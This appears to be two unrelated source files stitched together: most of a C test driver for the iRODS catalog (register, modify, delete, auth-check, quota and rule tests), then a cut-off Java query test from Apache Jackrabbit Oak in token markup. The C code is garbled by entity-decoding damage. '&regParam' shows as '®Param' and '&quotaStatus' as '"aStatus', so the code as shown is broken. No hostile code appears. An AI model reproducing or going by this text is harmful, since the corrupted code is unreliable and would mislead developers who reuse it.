}
int testCheckAuth( rsComm_t *rsComm, char *testAdminUser, char *testUser,
char *testUserZone ) {
/* Use an pre-determined user, challenge and resp */
char response[RESPONSE_LEN + 2];
char challenge[CHALLENGE_LEN + 2];
int userPrivLevel;
int clientPrivLevel;
int status, i;
char userNameAndZone[NAME_LEN * 2];
snprintf( rsComm->clientUser.userName, sizeof( rsComm->clientUser.userName ), "%s", testUser );
snprintf( rsComm->clientUser.rodsZone, sizeof( rsComm->clientUser.rodsZone ), "%s", testUserZone );
for ( i = 0; i < CHALLENGE_LEN + 2; i++ ) {
challenge[i] = ' ';
}
i = 0;
response[i++] = 0xd6; /* found to be a valid response */
response[i++] = 0x8a;
response[i++] = 0xaf;
response[i++] = 0xc4;
response[i++] = 0x83;
response[i++] = 0x46;
response[i++] = 0x1b;
response[i++] = 0xa2;
response[i++] = 0x5c;
response[i++] = 0x8c;
response[i++] = 0x6d;
response[i++] = 0xc5;
response[i++] = 0xb1;
response[i++] = 0x41;
response[i++] = 0x84;
response[i++] = 0xeb;
response[i++] = 0x00;
strncpy( userNameAndZone, testAdminUser, sizeof userNameAndZone );
userNameAndZone[ sizeof( userNameAndZone ) - 1 ] = '\0'; // JMC cppcheck - dangerous use of strncpy
strncat( userNameAndZone, "#", sizeof userNameAndZone - strlen( userNameAndZone ) );
strncat( userNameAndZone, testUserZone, sizeof userNameAndZone - strlen( userNameAndZone ) );
status = chlCheckAuth( rsComm, 0, challenge, response,
userNameAndZone,
&userPrivLevel, &clientPrivLevel );
if ( status == 0 ) {
printf( "clientPrivLevel=%d\n", clientPrivLevel );
}
return status;
}
int testDelFile( rsComm_t *rsComm, char *name, char *replica ) {
dataObjInfo_t dataObjInfo;
keyValPair_t *condInput;
memset( &dataObjInfo, 0, sizeof( dataObjInfo ) );
if ( replica != NULL && *replica != 0 ) {
int ireplica;
ireplica = atoi( replica );
if ( ireplica >= 0 ) {
dataObjInfo.replNum = ireplica;
}
if ( ireplica == 999999 ) {
dataObjInfo.replNum = -1;
}
}
snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
memset( &condInput, 0, sizeof( condInput ) );
return chlUnregDataObj( rsComm, &dataObjInfo, condInput );
}
int testDelFilePriv( rsComm_t *rsComm, char *name, char *dataId,
char *replica ) {
dataObjInfo_t dataObjInfo;
keyValPair_t condInput;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
memset( &condInput, 0, sizeof( condInput ) );
addKeyVal( &condInput, ADMIN_KW, " " );
memset( &dataObjInfo, 0, sizeof( dataObjInfo ) );
if ( dataId != NULL && *dataId != 0 ) {
rodsLong_t idataId;
idataId = strtoll( dataId, NULL, 0 );
if ( idataId >= 0 ) {
dataObjInfo.dataId = idataId;
}
}
dataObjInfo.replNum = -1;
if ( replica != NULL && *replica != 0 ) {
int ireplica;
ireplica = atoi( replica );
if ( ireplica >= 0 ) {
dataObjInfo.replNum = ireplica;
}
}
snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
return chlUnregDataObj( rsComm, &dataObjInfo, &condInput );
}
int testDelFileTrash( rsComm_t *rsComm, char *name, char *dataId ) {
dataObjInfo_t dataObjInfo;
keyValPair_t condInput;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
memset( &condInput, 0, sizeof( condInput ) );
addKeyVal( &condInput, ADMIN_RMTRASH_KW, " " );
memset( &dataObjInfo, 0, sizeof( dataObjInfo ) );
if ( dataId != NULL && *dataId != 0 ) {
rodsLong_t idataId;
idataId = strtoll( dataId, NULL, 0 );
if ( idataId >= 0 ) {
dataObjInfo.dataId = idataId;
}
}
dataObjInfo.replNum = -1;
snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
return chlUnregDataObj( rsComm, &dataObjInfo, &condInput );
}
int testRegColl( rsComm_t *rsComm, char *name ) {
collInfo_t collInp;
snprintf( collInp.collName, sizeof( collInp.collName ), "%s", name );
return chlRegColl( rsComm, &collInp );
}
int testDelColl( rsComm_t *rsComm, char *name ) {
collInfo_t collInp;
snprintf( collInp.collName, sizeof( collInp.collName ), "%s", name );
return chlDelColl( rsComm, &collInp );
}
int testDelRule( rsComm_t *rsComm, char *ruleName, char *userName ) {
if ( userName != NULL && strlen( userName ) > 0 ) {
rsComm->clientUser.authInfo.authFlag = LOCAL_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_USER_AUTH;
snprintf( rsComm->clientUser.userName, sizeof( rsComm->clientUser.userName ),
"%s", userName );
}
else {
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
}
return chlDelRuleExec( rsComm, ruleName );
}
int testRegDataObj( rsComm_t *rsComm, char *name,
char *dataType, char *filePath ) {
dataObjInfo_t dataObjInfo;
memset( &dataObjInfo, 0, sizeof( dataObjInfo_t ) );
snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
dataObjInfo.replNum = 1;
snprintf( dataObjInfo.version, sizeof( dataObjInfo.version ), "%s", "12" );
snprintf( dataObjInfo.dataType, sizeof( dataObjInfo.dataType ), "%s", dataType );
dataObjInfo.dataSize = 42;
snprintf( dataObjInfo.rescName, sizeof( dataObjInfo.rescName ), "%s", "demoResc" );
snprintf( dataObjInfo.filePath, sizeof( dataObjInfo.filePath ), "%s", filePath );
dataObjInfo.replStatus = 5;
return chlRegDataObj( rsComm, &dataObjInfo );
}
/*
Do multiple data registrations. If you comment out the commit in
chlRegDataObj and then build this, it can add phony data-objects at
about 8 times the speed of lots of iput's of small files. This can
come in handy for creating simulated large instances for DBMS
performance testing and tuning. In this source file, you might also
want to change rodsLogLevel(LOG_NOTICE) to rodsLogLevel(LOG_ERROR)
and comment out rodsLogSqlReq(1);.
name is the objPath (collection/dataObj)
objPath = /newZone/home/rods/ws/f3"
filePath is the physical path
filePath = "/home/schroeder/iRODS/Vault/home/rods/ws/f3"
Example:
bin/test_chl regmulti 1000 /newZone/home/rods/ws2/f1 generic /tmp/vault/f1
*/
int testRegDataMulti( rsComm_t *rsComm, char *count,
char *nameBase, char *dataType, char *filePath ) {
try {
const int myCount = boost::lexical_cast<int>( count );
if ( myCount <= 0 || myCount > std::numeric_limits<int>::max() ) {
printf( "Invalid input: count\n" );
return USER_INPUT_OPTION_ERR;
}
for ( int i = 0; i < myCount; i++ ) {
char myName[MAX_NAME_LEN];
snprintf( myName, sizeof myName, "%s.%d", nameBase, i );
int status = testRegDataObj( rsComm, myName, dataType, filePath );
if ( status ) {
return status;
}
}
return chlCommit( rsComm );
}
catch ( ... ) {
printf( "Invalid input: count\n" );
return USER_INPUT_OPTION_ERR;
}
}
int testModDataObjMeta( rsComm_t *rsComm, char *name,
char *dataType, char *filePath ) {
dataObjInfo_t dataObjInfo;
int status;
keyValPair_t regParam;
char tmpStr[LONG_NAME_LEN], tmpStr2[LONG_NAME_LEN];
/* int replStatus; */
memset( &dataObjInfo, 0, sizeof( dataObjInfo_t ) );
memset( ®Param, 0, sizeof( regParam ) );
/*
replStatus=1;
snprintf (tmpStr, LONG_NAME_LEN, "%d", replStatus);
addKeyVal (®Param, "replStatus", tmpStr);
*/
snprintf( tmpStr, sizeof tmpStr, "fake timestamp" );
addKeyVal( ®Param, "dataCreate", tmpStr );
snprintf( tmpStr2, sizeof tmpStr2, "test comment" );
addKeyVal( ®Param, "dataComments", tmpStr2 );
snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
/* dataObjInfo.replNum=1; */
dataObjInfo.replNum = 0;
snprintf( dataObjInfo.version, sizeof( dataObjInfo.version ), "%s", "12" );
snprintf( dataObjInfo.dataType, sizeof( dataObjInfo.dataType ), "%s", dataType );
dataObjInfo.dataSize = 42;
snprintf( dataObjInfo.rescName, sizeof( dataObjInfo.rescName ), "%s", "resc A" );
snprintf( dataObjInfo.filePath, sizeof( dataObjInfo.filePath ), "%s", filePath );
dataObjInfo.replStatus = 5;
status = chlModDataObjMeta( rsComm, &dataObjInfo, ®Param );
return status;
}
int testModDataObjMeta2( rsComm_t *rsComm, char *name,
char *dataType, char *filePath ) {
dataObjInfo_t dataObjInfo;
int status;
keyValPair_t regParam;
char tmpStr[LONG_NAME_LEN], tmpStr2[LONG_NAME_LEN];
memset( &dataObjInfo, 0, sizeof( dataObjInfo_t ) );
memset( ®Param, 0, sizeof( regParam ) );
snprintf( tmpStr, sizeof tmpStr, "whatever" );
addKeyVal( ®Param, "all", tmpStr );
snprintf( tmpStr2, sizeof tmpStr2, "42" );
addKeyVal( ®Param, "dataSize", tmpStr2 );
snprintf( dataObjInfo.objPath, sizeof( dataObjInfo.objPath ), "%s", name );
dataObjInfo.replNum = 0;
snprintf( dataObjInfo.version, sizeof( dataObjInfo.version ), "%s", "12" );
snprintf( dataObjInfo.dataType, sizeof( dataObjInfo.dataType ), "%s", dataType );
dataObjInfo.dataSize = 42;
snprintf( dataObjInfo.rescName, sizeof( dataObjInfo.rescName ), "%s", "resc A" );
snprintf( dataObjInfo.filePath, sizeof( dataObjInfo.filePath ), "%s", filePath );
dataObjInfo.replStatus = 5;
status = chlModDataObjMeta( rsComm, &dataObjInfo, ®Param );
return status;
}
int testModColl( rsComm_t *rsComm, char *name, char *type,
char *info1, char *info2 ) {
int status;
collInfo_t collInp;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
memset( &collInp, 0, sizeof( collInp ) );
if ( name != NULL && strlen( name ) > 0 ) {
snprintf( collInp.collName, sizeof( collInp.collName ), "%s", name );
}
if ( type != NULL && strlen( type ) > 0 ) {
snprintf( collInp.collType, sizeof( collInp.collType ), "%s", type );
}
if ( info1 != NULL && strlen( info1 ) > 0 ) {
snprintf( collInp.collInfo1, sizeof( collInp.collInfo1 ), "%s", info1 );
}
if ( info2 != NULL && strlen( info2 ) > 0 ) {
snprintf( collInp.collInfo2, sizeof( collInp.collInfo2 ), "%s", info2 );
}
status = chlModColl( rsComm, &collInp );
if ( status != 0 ) {
return status;
}
status = chlCommit( rsComm );
return status;
}
int testModRuleMeta( rsComm_t *rsComm, char *id,
char *attrName, char *attrValue ) {
/* ruleExecSubmitInp_t ruleInfo; */
char ruleId[100];
int status;
keyValPair_t regParam;
char tmpStr[LONG_NAME_LEN];
/* memset(&ruleInfo,0,sizeof(ruleExecSubmitInp_t)); */
memset( ®Param, 0, sizeof( regParam ) );
rstrcpy( tmpStr, attrValue, sizeof tmpStr );
addKeyVal( ®Param, attrName, tmpStr );
snprintf( ruleId, sizeof( ruleId ), "%s", id );
status = chlModRuleExec( rsComm, ruleId, ®Param );
return status;
}
int testModResourceFreeSpace( rsComm_t *rsComm, char *rescName,
char *numberString, char *option ) {
if ( *numberString == '\\' ) {
numberString++;
}
int number = atoi( numberString );
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
int status = chlModRescFreeSpace( rsComm, rescName, number );
if ( status != 0 ) {
return status;
}
if ( option != NULL && strcmp( option, "rollback" ) == 0 ) {
status = chlRollback( rsComm );
if ( status < 0 ) {
rodsLog( LOG_ERROR, "chlRollback failed in testModResourceFreeSpace %d", status );
}
}
if ( option != NULL && strcmp( option, "close" ) == 0 ) {
status = chlClose();
return status;
}
status = chlCommit( rsComm );
return status;
}
int testRegReplica( rsComm_t *rsComm, char *srcPath, char *srcDataId,
char *srcReplNum, char *dstPath ) {
dataObjInfo_t srcDataObjInfo;
dataObjInfo_t dstDataObjInfo;
keyValPair_t condInput;
int status;
memset( &srcDataObjInfo, 0, sizeof( dataObjInfo_t ) );
memset( &dstDataObjInfo, 0, sizeof( dataObjInfo_t ) );
memset( &condInput, 0, sizeof( condInput ) );
snprintf( srcDataObjInfo.objPath, sizeof( srcDataObjInfo.objPath ), "%s", srcPath );
srcDataObjInfo.dataId = atoi( srcDataId );
srcDataObjInfo.replNum = atoi( srcReplNum );
snprintf( dstDataObjInfo.rescName, sizeof( dstDataObjInfo.rescName ), "%s", "resc A" );
snprintf( dstDataObjInfo.filePath, sizeof( dstDataObjInfo.filePath ), "%s", dstPath );
dstDataObjInfo.replStatus = 5;
status = chlRegReplica( rsComm, &srcDataObjInfo, &dstDataObjInfo,
&condInput );
return status;
}
int testSimpleQ( rsComm_t *rsComm, char *sql, char *arg1, char *format ) {
char bigBuf[1000];
int status;
int control;
int form;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
control = 0;
form = 1;
if ( format != NULL ) {
form = atoi( format );
}
status = chlSimpleQuery( rsComm, sql, arg1, 0, 0, 0,
form, &control, bigBuf, 1000 );
if ( status == 0 ) {
printf( "%s", bigBuf );
}
while ( control && ( status == 0 ) ) {
status = chlSimpleQuery( rsComm, sql, 0, 0, 0, 0,
form, &control, bigBuf, 1000 );
if ( status == 0 ) {
printf( "%s", bigBuf );
}
}
return status;
}
int testChmod( rsComm_t *rsComm, char *user, char *zone,
char *access, char *path ) {
int status;
status = chlModAccessControl( rsComm, 0, user, zone, access, path );
return status;
}
int testServerLoad( rsComm_t *rsComm, char *option ) {
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlRegServerLoad( rsComm, "host", "resc", option, "2", "3",
"4", "5", "6", "7" );
return status;
}
int testPurgeServerLoad( rsComm_t *rsComm, char *option ) {
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
if ( option == NULL ) {
status = chlPurgeServerLoad( rsComm, "2000" );
}
else {
status = chlPurgeServerLoad( rsComm, option );
}
return status;
}
int testServerLoadDigest( rsComm_t *rsComm, char *option ) {
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlRegServerLoadDigest( rsComm, "resc", option );
return status;
}
int testPurgeServerLoadDigest( rsComm_t *rsComm, char *option ) {
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
if ( option == NULL ) {
status = chlPurgeServerLoadDigest( rsComm, "2000" );
}
else {
status = chlPurgeServerLoadDigest( rsComm, option );
}
return status;
}
int testCheckQuota( rsComm_t *rsComm, char *userName, char *rescName,
char *expectedQuota, char *expectedStatus ) {
int status;
int quotaStatus;
rodsLong_t userQuota;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlCheckQuota( rsComm, userName, rescName,
&userQuota, "aStatus );
rodsLog( LOG_SQL,
"chlCheckQuota status: userName:%s rescName:%s userQuota:%lld quotaStatus:%d\n",
userName, rescName, userQuota, quotaStatus );
if ( status == 0 ) {
int iExpectedStatus;
rodsLong_t iExpectedQuota;
if ( expectedQuota != NULL && strlen( expectedQuota ) > 0 ) {
rodsLong_t i;
iExpectedQuota = atoll( expectedQuota );
if ( expectedQuota[0] == 'm' ) {
i = atoll( ( char * )&expectedQuota[1] );
iExpectedQuota = -i;
}
if ( iExpectedQuota != userQuota ) {
status = -1;
}
}
if ( expectedStatus != NULL && strlen( expectedStatus ) > 0 ) {
iExpectedStatus = atoi( expectedStatus );
if ( iExpectedStatus != quotaStatus ) {
status = -2;
}
}
}
return status;
}
rodsLong_t
testCurrent() {
rodsLong_t status = 0;
icatSessionStruct *icss;
chlGetRcs( &icss );
// JMC status = cmlGetCurrentSeqVal( icss );
return status;
}
int
testAddRule( rsComm_t *rsComm, char *baseName, char *ruleName,
char *ruleHead, char *ruleCondition, char *ruleAction,
char *ruleRecovery ) {
int status;
char ruleIdStr[200];
char myTime[] = "01277237323";
char priority[] = "1";
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlInsRuleTable( rsComm, baseName, priority, ruleName,
ruleHead, ruleCondition, ruleAction,
ruleRecovery, ( char * )&ruleIdStr, ( char * )&myTime );
if ( status == 0 ) {
printf( "ruleIdStr: %s\n", ruleIdStr );
}
return status;
}
int
testVersionRuleBase( rsComm_t *rsComm, char *baseName ) {
int status;
char myTime[] = "01277237323";
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlVersionRuleBase( rsComm, baseName, ( char * )&myTime );
return status;
}
int
testVersionDvmBase( rsComm_t *rsComm, char *baseName ) {
int status;
char myTime[] = "01277237323";
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlVersionDvmBase( rsComm, baseName, ( char * )&myTime );
return status;
}
int
testInsFnmTable( rsComm_t *rsComm, char *arg1, char *arg2, char *arg3,
char *arg4 ) {
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlInsFnmTable( rsComm, arg1, arg2, arg3, arg4 );
return status;
}
int
testInsMsrvcTable( rsComm_t *rsComm, char *arg1, char *arg2, char *arg3,
char *arg4, char *arg5, char *arg6, char *arg7, char *arg8,
char *arg9 ) {
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlInsMsrvcTable( rsComm, arg1, arg2, arg3, arg4,
arg5, arg6, arg7, arg8, arg9, "0" );
return status;
}
int
testInsDvmTable( rsComm_t *rsComm, char *arg1, char *arg2, char *arg3,
char *arg4 ) {
int status;
char myTime[] = "01277237323";
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlInsDvmTable( rsComm, arg1, arg2, arg3, arg4, myTime );
return status;
}
int
testVersionFnmBase( rsComm_t *rsComm, char *arg1 ) {
int status;
char myTime[] = "01277237323";
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlVersionFnmBase( rsComm, arg1, myTime );
return status;
}
int
main( int argc, char **argv ) {
int status;
rsComm_t *Comm;
char *mySubName;
char *myName;
int didOne;
Comm = ( rsComm_t* )malloc( sizeof( rsComm_t ) );
memset( Comm, 0, sizeof( rsComm_t ) );
rodsLogLevel( LOG_NOTICE );
rodsLogSqlReq( 1 );
if ( argc < 2 ) {
printf( "Usage: test_chl testName [args...]\n" );
exit( 3 );
}
rodsEnv myEnv;
status = getRodsEnv( &myEnv );
if ( status < 0 ) {
rodsLog( LOG_ERROR, "main: getRodsEnv error. status = %d",
status );
exit( 1 );
}
if ( strstr( myEnv.rodsDebug, "CAT" ) != NULL ) {
chlDebug( myEnv.rodsDebug );
}
snprintf( Comm->clientUser.userName, sizeof( Comm->clientUser.userName ),
"%s", myEnv.rodsUserName );
snprintf( Comm->clientUser.rodsZone, sizeof( Comm->clientUser.rodsZone ),
"%s", myEnv.rodsZone );
/*
char rodsUserName[NAME_LEN];
char rodsZone[NAME_LEN];
userInfo_t clientUser;
char userName[NAME_LEN];
char rodsZone[NAME_LEN];
*/
if ( ( status = chlOpen() ) != 0 ) {
rodsLog( LOG_SYS_FATAL,
"initInfoWithRcat: chlopen Error. Status = %d",
status );
free( Comm ); // JMC cppcheck - leak
return status;
}
didOne = 0;
if ( strcmp( argv[1], "reg" ) == 0 ) {
status = testRegDataObj( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "regmulti" ) == 0 ) {
status = testRegDataMulti( Comm, argv[2], argv[3], argv[4], argv[5] );
didOne = 1;
}
if ( strcmp( argv[1], "mod" ) == 0 ) {
status = testModDataObjMeta( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "mod2" ) == 0 ) {
status = testModDataObjMeta2( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "modr" ) == 0 ) {
status = testModRuleMeta( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "modc" ) == 0 ) {
status = testModColl( Comm, argv[2], argv[3], argv[4], argv[5] );
didOne = 1;
}
if ( strcmp( argv[1], "rmrule" ) == 0 ) {
status = testDelRule( Comm, argv[2], argv[3] );
didOne = 1;
}
if ( strcmp( argv[1], "modrfs" ) == 0 ) {
status = testModResourceFreeSpace( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "rep" ) == 0 ) {
if ( argc < 6 ) {
printf( "too few arguments\n" );
exit( 1 );
}
status = testRegReplica( Comm, argv[2], argv[3], argv[4], argv[5] );
didOne = 1;
}
/*
if (strcmp(argv[1],"cml")==0) {
status = testCml(Comm);
didOne=1;
}
*/
if ( strcmp( argv[1], "mkdir" ) == 0 ) {
status = testRegColl( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "rmdir" ) == 0 ) {
status = testDelColl( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "sql" ) == 0 ) {
status = testSimpleQ( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "rm" ) == 0 ) {
status = testDelFile( Comm, argv[2], argv[3] );
didOne = 1;
}
if ( strcmp( argv[1], "rmtrash" ) == 0 ) {
status = testDelFileTrash( Comm, argv[2], argv[3] );
didOne = 1;
}
if ( strcmp( argv[1], "rmpriv" ) == 0 ) {
status = testDelFilePriv( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "chmod" ) == 0 ) {
status = testChmod( Comm, argv[2], argv[3], argv[4], argv[5] );
didOne = 1;
}
if ( strcmp( argv[1], "regrule" ) == 0 ) {
status = testRegRule( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "rename" ) == 0 ) {
status = testRename( Comm, argv[2], argv[3] );
// JMC testCurrent(); // exercise this as part of rename;
// testCurrent needs a SQL context
didOne = 1;
}
if ( strcmp( argv[1], "login" ) == 0 ) {
printf( "login - 2 [%s] 3 [%s] 4 [%s]\n", argv[2], argv[3], argv[4] );
status = testLogin( argv[2], argv[3], argv[4], myEnv );
didOne = 1;
}
if ( strcmp( argv[1], "move" ) == 0 ) {
status = testMove( Comm, argv[2], argv[3] );
didOne = 1;
}
if ( strcmp( argv[1], "checkauth" ) == 0 ) {
status = testCheckAuth( Comm, argv[2], argv[3], argv[4] );
didOne = 1;
}
if ( strcmp( argv[1], "temppw" ) == 0 ) {
status = testTempPw( Comm );
didOne = 1;
}
if ( strcmp( argv[1], "tpc" ) == 0 ) {
status = testTempPwConvert( argv[2], argv[3] );
didOne = 1;
}
if ( strcmp( argv[1], "tpw" ) == 0 ) {
status = testTempPwCombined( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "tpwforother" ) == 0 ) {
status = testTempPwForOther( Comm, argv[2], argv[3] );
didOne = 1;
}
if ( strcmp( argv[1], "serverload" ) == 0 ) {
status = testServerLoad( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "purgeload" ) == 0 ) {
status = testPurgeServerLoad( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "serverdigest" ) == 0 ) {
status = testServerLoadDigest( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "purgedigest" ) == 0 ) {
status = testPurgeServerLoadDigest( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "checkquota" ) == 0 ) {
if ( argc < 5 ) {
status = testCheckQuota( Comm, argv[2], argv[3],
NULL, NULL );
}
else {
status = testCheckQuota( Comm, argv[2], argv[3],
argv[4], argv[5] );
}
didOne = 1;
}
if ( strcmp( argv[1], "open" ) == 0 ) {
int i;
for ( i = 0; i < 3; i++ ) {
status = chlClose();
if ( status ) {
printf( "close %d error", i );
}
if ( ( status = chlOpen() ) != 0 ) {
rodsLog( LOG_SYS_FATAL,
"initInfoWithRcat: chlopen %d Error. Status = %d",
i, status );
return status;
}
}
didOne = 1;
}
if ( strcmp( argv[1], "addrule" ) == 0 ) {
status = testAddRule( Comm, argv[2], argv[3],
argv[4], argv[5],
argv[6], argv[7] );
didOne = 1;
}
if ( strcmp( argv[1], "versionrulebase" ) == 0 ) {
status = testVersionRuleBase( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "versiondvmbase" ) == 0 ) {
status = testVersionDvmBase( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "versionfnmbase" ) == 0 ) {
status = testVersionFnmBase( Comm, argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "insfnmtable" ) == 0 ) {
status = testInsFnmTable( Comm, argv[2], argv[3], argv[4], argv[5] );
didOne = 1;
}
if ( strcmp( argv[1], "insdvmtable" ) == 0 ) {
status = testInsDvmTable( Comm, argv[2], argv[3], argv[4], argv[5] );
didOne = 1;
}
if ( strcmp( argv[1], "insmsrvctable" ) == 0 ) {
status = testInsMsrvcTable( Comm, argv[2], argv[3], argv[4], argv[5],
argv[6], argv[7], argv[8], argv[9], argv[10] );
if ( status == 0 ) {
/* do it a second time to test another logic path and
different SQL. Since no commit is part of the chl
function, and there is not corresponding Delete call, this
is an easy way to do this. */
status = testInsMsrvcTable( Comm, argv[2], argv[3], argv[4], argv[5],
argv[6], argv[7], argv[8], argv[9], argv[10] );
}
didOne = 1;
}
if ( strcmp( argv[1], "getlocalzone" ) == 0 ) {
status = testGetLocalZone( argv[2] );
didOne = 1;
}
if ( strcmp( argv[1], "getpampw" ) == 0 ) {
status = testGetPamPw( Comm, argv[2], argv[3] );
didOne = 1;
}
if ( status != 0 ) {
/*
if (Comm->rError) {
rError_t *Err;
rErrMsg_t *ErrMsg;
int i, len;
Err = Comm->rError;
len = Err->len;
for (i=0;i<len;i++) {
ErrMsg = Err->errMsg[i];
rodsLog(LOG_ERROR, "Level %d: %s",i, ErrMsg->msg);
}
}
*/
myName = rodsErrorName( status, &mySubName );
rodsLog( LOG_ERROR, "%s failed with error %d %s %s", argv[1],
status, myName, mySubName );
}
else {
if ( didOne ) {
printf( "Completed successfully\n" );
}
}
if ( didOne == 0 ) {
printf( "Unknown test type: %s\n", argv[1] );
}
exit( status );
}
/* This is a dummy version of icatApplyRule for this test program so
- the rule-engine is not needed in this ICAT test. */
int
icatApplyRule( rsComm_t*, char*, char* ) {
return 0;
}
|
sho25/jackrabbit-oak
|
oak-lucene/src/test/java/org/apache/jackrabbit/oak/jcr/query/TextExtractionQueryTest.java
|
<filename>oak-lucene/src/test/java/org/apache/jackrabbit/oak/jcr/query/TextExtractionQueryTest.java
begin_unit|revision:0.9.5;language:Java;cregit-version:0.0.1
begin_comment
comment|/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */
end_comment
begin_package
package|package
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|oak
operator|.
name|jcr
operator|.
name|query
package|;
end_package
begin_import
import|import
name|java
operator|.
name|io
operator|.
name|ByteArrayInputStream
import|;
end_import
begin_import
import|import
name|java
operator|.
name|io
operator|.
name|IOException
import|;
end_import
begin_import
import|import
name|java
operator|.
name|io
operator|.
name|InputStream
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|Binary
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|Node
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|RepositoryException
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|nodetype
operator|.
name|NodeType
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|InvalidQueryException
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|Query
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|QueryResult
import|;
end_import
begin_import
import|import
name|javax
operator|.
name|jcr
operator|.
name|query
operator|.
name|RowIterator
import|;
end_import
begin_import
import|import
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|JcrConstants
import|;
end_import
begin_import
import|import
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|commons
operator|.
name|JcrUtils
import|;
end_import
begin_import
import|import
name|org
operator|.
name|apache
operator|.
name|jackrabbit
operator|.
name|core
operator|.
name|query
operator|.
name|AbstractQueryTest
import|;
end_import
begin_class
specifier|public
class|class
name|TextExtractionQueryTest
extends|extends
name|AbstractQueryTest
block|{
specifier|public
name|void
name|testScoreWithoutFulltext
parameter_list|()
throws|throws
name|Exception
block|{
name|System
operator|.
name|out
operator|.
name|println
argument_list|(
name|Query
operator|.
name|JCR_SQL2
argument_list|)
expr_stmt|;
name|QueryResult
name|r
init|=
name|executeSQL2Query
argument_list|(
literal|"select [jcr:path] from [nt:base] order by [jcr:score]"
argument_list|)
decl_stmt|;
name|RowIterator
name|it
init|=
name|r
operator|.
name|getRows
argument_list|()
decl_stmt|;
while|while
condition|(
name|it
operator|.
name|hasNext
argument_list|()
condition|)
block|{
name|it
operator|.
name|nextRow
argument_list|()
expr_stmt|;
block|}
block|}
specifier|public
name|void
name|testFileContains
parameter_list|()
throws|throws
name|Exception
block|{
name|assertFileContains
argument_list|(
literal|"test.txt"
argument_list|,
literal|"text/plain"
argument_list|,
literal|"AE502DBEA2C411DEBD340AD156D89593"
argument_list|)
expr_stmt|;
name|assertFileContains
argument_list|(
literal|"test.rtf"
argument_list|,
